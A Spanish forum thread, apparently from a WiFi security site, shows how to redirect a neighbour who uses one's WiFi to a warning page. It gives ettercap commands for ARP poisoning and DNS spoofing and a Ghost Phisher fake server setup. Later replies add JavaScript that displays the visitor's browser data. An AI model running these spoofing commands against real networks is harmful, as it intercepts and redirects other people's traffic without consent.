Autor Tema: El cazador cazado con Wifislax4.3: Dar un sustíllo al vecino que te roba el WiFi (Leído 59102 veces)

geminis_demon · « **en:** 22-01-2013, 05:07 (Martes) »

Hola, os voy a explicar una forma rápida y sencilla de ahuyentar a un vecino que se está colando en tu red.

Lo que vamos a hacer es crear un pequeño servidor local donde pondremos un index sencillo con un mensaje para nuestro vecino, después con ettercap haremos un dns spoof de forma que cuando el intruso intente acceder a cualquier página web será redireccionado a nuestro servidor local y verá el mensaje que le hemos dejado.

Empezamos creando el archivo html con el mensaje para nuestro querido vecino. Yo usaré este:

Código: [Seleccionar]

<HTML>
<HEAD>
<TITLE>ACCESO DENEGADO</TITLE>
</HEAD>
<BODY BGCOLOR="BLACK" TEXT="RED">
<TABLE WIDTH="100%" HEIGHT="100%">
<TR>
<TD VALIGN="MIDDLE" ALIGN="CENTER">
<H1><B>TE ESTOY VIGILANDO, NO ME ROBES EL WIFI.</B></H1>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>

Lo guardamos en el escritorio con el nombre index.html

Para crear el servidor http vamos a usar Ghost Phisher, podríamos usar Xampp, lighttp o cualquier otro servidor web pero he elegido Ghost Phisher por que ya viene de serie en Wifislax y así no tenemos que instalar ninguna aplicación extra.

Bien, pues abrimos Ghost Phisher y nos vamos a la pestaña "Fake HTTP Server". Seleccionamos la interface, seleccionamos el archivo html que hemos creado antes y marcamos la casilla "Hosting Mode".

Quedaría así:

Pulsamos en "Start" y se pondrá en marcha el servidor http.

Abrimos una terminal y ejecutamos lo siguientes comandos:

Código: [Seleccionar]

echo "* A 192.168.1.138" >/usr/share/ettercap/etter.dns

Código: [Seleccionar]

ettercap -T -q -P autoadd -M arp // // -i wlan0 & ettercap -T -q -P dns_spoof -i wlan0
Mi IP interna es 192.168.1.138 y la interface con la que estoy conectado a internet es wlan0 lógicamente tendréis que poner vuestra IP y vuestra interface.

Ahora cuando el vecino intente acceder a cualquier página verá esto en su navegador:

Como podréis comprobar, no soy diseñador gráfico, que cada uno se curre su index

ACTUALIZACIÓN: Para los vagos que no les gusta hacer las cosas a mano, he hecho este script que lo hace todo automáticamente: https://foro.seguridadwireless.net/live-wifislax/modulos-xzm-para-wifislax-4-3/msg272009/#msg272009

Saludos.

orion999 · « **Respuesta #1 en:** 22-01-2013, 15:05 (Martes) »

Le ponemos una chincheta , para que no se pierda

Buen trabajo , torpedo

geminis_demon · « **Respuesta #2 en:** 22-01-2013, 17:05 (Martes) »

Cita de: o r i o n en 22-01-2013, 15:05 (Martes)

Le ponemos una chincheta , para que no se pierda

Buen trabajo , torpedo

Thanks

USUARIONUEVO · « **Respuesta #3 en:** 24-01-2013, 04:11 (Jueves) »

probado y funciona.

tal vez en el ejemplo del index.html

cambiaria donde el texto de mensaje

a esto

Código: [Seleccionar]

<h1><B>TE ESTOY VIGILANDO,NO ME ROBES EL WIFI.</B></h1>
el h1 , hace que el texto se vea mas grande

geminis_demon · « **Respuesta #4 en:** 12-02-2013, 15:46 (Martes) »

He modificado el post, he puesto lo de <H1> en el index y una imagen mas explicativa.

wifiandroid · « **Respuesta #5 en:** 14-02-2013, 20:52 (Jueves) »

Habéis probado con un poco de java dentro del HTML.....eso daría mas juego....este post es bueno,creo que alguien lo plagiara para su web je je jr

geminis_demon · « **Respuesta #6 en:** 14-02-2013, 22:50 (Jueves) »

Cita de: wifiandroid en 14-02-2013, 20:52 (Jueves)

Habéis probado con un poco de java dentro del HTML.....eso daría mas juego....este post es bueno,creo que alguien lo plagiara para su web je je jr

Uhm.. que quieres hacer con java? Yo es que en ese campo estoy bastante limitado, si quieres currarte un index mas chulo ponlo aquí y lo pongo en el post principal.

Hwagm · « **Respuesta #7 en:** 14-02-2013, 23:18 (Jueves) »

Me gusta ese post, con permiso, lo añado en la web, son este tipo de post, que suelen tener exito si los hacen otras personas y lo publican en otro sitios, quizas meneme xd

wifiandroid se refiere no a java, sino JavaScript, y hay cositas interesantes, esta estaria muy bien.... porque asusta mas jejeje

Información de navegación

Código: [Seleccionar]

<script language="javascript" type="text/javascript">
function procedencia() {
	var informacion = document.referrer	//inormacion de la procedencia
	var longitud = informacion.length
	var x = 0
       
	while (x < longitud) {					//trocea el resultado porque es muy largo
		document.write( informacion.substring(x, x + 16) + ' ' )
		x += 16
	}
}

function navegador() {
	document.write(navigator.appName)
}

function plataforma() {
	document.write(navigator.platform)
}

function version() {
	document.write(navigator.appVersion)
}

function historial() {
	document.write(history.length)
}

function check_java() {
	if (navigator.javaEnabled())
		document.write('Sí')
	else
		document.write('No')
}

function check_taint() {
	if (navigator.taintEnabled())
		document.write('Sí')
	else
		document.write('No')
}




</script>

En el body pones esto

Código: [Seleccionar]

<p><small>Procedencia</small><br><b><script LANGUAGE="JavaScript">procedencia()</script></b></p><p><small>Cliente</small><br><b><script LANGUAGE="JavaScript">navegador()</script></b></p><p><small>Versión</small><br><b><script LANGUAGE="JavaScript">version()</script></b></p><p><small>Plataforma (1)</small><br><b><script LANGUAGE="JavaScript">plataforma()</script></b></p><p><small>Número de páginas visitadas</small><br><b><script LANGUAGE="JavaScript">historial()</script></b></p><p><small>¿Habilitado Java?</small><br><b><script LANGUAGE="JavaScript">check_java()</script></b></p><p><small>¿Habilitado Taint? (2)</small><br><b><script LANGUAGE="JavaScript">check_taint()</script></b>

Hwagm · « **Respuesta #8 en:** 14-02-2013, 23:27 (Jueves) »

Es ^-^pera que te lo paso hecho, y por favor las etiquetas en html siempre en minusculas

Hwagm · « **Respuesta #9 en:** 14-02-2013, 23:31 (Jueves) »

http://www.seguridadwireless.net/htm/cazado.html

Código: [Seleccionar]

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Control seguridad antiespionaje</title>
<script language="javascript" type="text/javascript">
function procedencia() {
	var informacion = document.referrer	//inormacion de la procedencia
	var longitud = informacion.length
	var x = 0
       
	while (x < longitud) {					//trocea el resultado porque es muy largo
		document.write( informacion.substring(x, x + 16) + ' ' )
		x += 16
	}
}

function navegador() {
	document.write(navigator.appName)
}

function plataforma() {
	document.write(navigator.platform)
}

function version() {
	document.write(navigator.appVersion)
}

function historial() {
	document.write(history.length)
}

function check_java() {
	if (navigator.javaEnabled())
		document.write('Sí')
	else
		document.write('No')
}

function check_taint() {
	if (navigator.taintEnabled())
		document.write('Sí')
	else
		document.write('No')
}


</script>
</head>

<body bgcolor="BLACK" text="RED">
<table width="100%" height="100%">
<tr><td valign="MIDDLE" align="CENTER">
<H1><B>TE ESTOY VIGILANDO, NO ME ROBES EL WIFI.</B></H1>
</td></tr>
<tr><td valign="MIDDLE" align="CENTER">
<p><small>Procedencia</small>
<br><b><script LANGUAGE="JavaScript">procedencia()</script></b></p>
<p><small>Cliente</small><br><b><script LANGUAGE="JavaScript">navegador()</script></b></p>
<p><small>Versión</small><br><b><script LANGUAGE="JavaScript">version()</script></b></p>
<p><small>Plataforma (1)</small><br><b><script LANGUAGE="JavaScript">plataforma()</script></b></p>
<p><small>Número de páginas visitadas</small><br><b><script LANGUAGE="JavaScript">historial()</script></b></p>
<p><small>¿Habilitado Java?</small><br><b><script LANGUAGE="JavaScript">check_java()</script></b></p>
<p><small>¿Habilitado Taint? (2)</small><br><b><script LANGUAGE="JavaScript">check_taint()</script></b>
</td></tr>
</table>
</body>
</html>

Hwagm · « **Respuesta #10 en:** 15-02-2013, 00:01 (Viernes) »

m el titulo es un poco lioso no jejeje

es como decir que el vecino usa el wifislax para robarte el wifi, y no es asi, igual esta usando windows jejej

digamos que usas wifislax como herramienta de antiintrusion

O el que nos gusta de siempre, el cazador cazado

geminis_demon · « **Respuesta #11 en:** 15-02-2013, 00:48 (Viernes) »

Cita de: Hwagm en 15-02-2013, 00:01 (Viernes)

m el titulo es un poco lioso no jejeje

es como decir que el vecino usa el wifislax para robarte el wifi, y no es asi, igual esta usando windows jejej

digamos que usas wifislax como herramienta de antiintrusion

O el que nos gusta de siempre, el cazador cazado

Está chulo el javascript ese que muestra los datos del navegador y tal, pero si pones el enlace al post ya no tiene gracia, porque entonces el vecino va a pensar: bah, este no tiene ni idea, ni me vijila ni na, solo ha seguido los pasos de un tutorial..., y de lo que se trata es de ahuyentarlo

Lo que si me mola es lo del cazador cazado, voy a cambiarle el título ^^

Hwagm · « **Respuesta #12 en:** 15-02-2013, 00:58 (Viernes) »

jeje te pille, no hay ningun link al post, te sale lo ultimo que tu has visitado jejej, y por eso te sale ese

el java mira en tu navegador lo ultimo visitado jeje

Hwagm · « **Respuesta #13 en:** 15-02-2013, 01:03 (Viernes) »

Procedencia

geminis_demon · « **Respuesta #14 en:** 15-02-2013, 01:18 (Viernes) »

Ok ya lo pillo.

Pero sabes que pasa, si no abro el link desde ninguna web no me sale nada en procedencia, por ejemplo si lo abro desde este post, en procedencia me sale el enlace a este post, si lo abro desde aquí: https://hwagm.elhacker.net/cazador-cazado-con-wifislax/, me sale ese enlace, pero si copio la url y la pego en el navegador, en procedencia no me sale nada.

Entonces me pregunto, que saldrá en procedencia cuando el vecino intente acceder a una web? yo creo que no le saldrá nada porque no a hecho clic en ninguna url para llegar hasta ese enlace, no?

sanson · « **Respuesta #15 en:** 15-02-2013, 01:22 (Viernes) »

Jejej esta muy bien

Ahora que geminis le active la webcam en una mini pantalla en la esquina superior tipo..............

Enviado desde mi GT-I9300 usando Tapatalk 2

Hwagm · « **Respuesta #16 en:** 16-02-2013, 03:18 (Sábado) »

Citar

yo creo que no le saldrá nada porque no a hecho clic en ninguna url para llegar hasta ese enlace, no?

seguramente no , pero es un mero ejemplo, se pueden poner mas cositas

http://www.htmlpoint.com/jscript/index.html

y hay cientos de paginas`

ahora el titulo mola mas

Hwagm · « **Respuesta #17 en:** 16-02-2013, 03:43 (Sábado) »

y su miramos de ponerlo en meneame, estas cosas suelen gustar, y por probar

quien tenia cuente?

creo que hadrianweb

Mwizi · « **Respuesta #18 en:** 27-05-2019, 13:29 (Lunes) »

Buenas, consigo que me salga el index que yo quiero pero solo en unas pocas webs, en otras no me sale mas que no se puede entrar y en otras si me deja. ¿tiene solución esto?

USUARIONUEVO · « **Respuesta #19 en:** 27-05-2019, 22:04 (Lunes) »

Cita de: Mwizi en 27-05-2019, 13:29 (Lunes)

Buenas, consigo que me salga el index que yo quiero pero solo en unas pocas webs, en otras no me sale mas que no se puede entrar y en otras si me deja. ¿tiene solución esto?

Los navegadores ya no aceptan http , forzando a usar https.

Noticias:

Autor Tema: El cazador cazado con Wifislax4.3: Dar un sustíllo al vecino que te roba el WiFi (Leído 59102 veces)

orion999

wifiandroid

Mwizi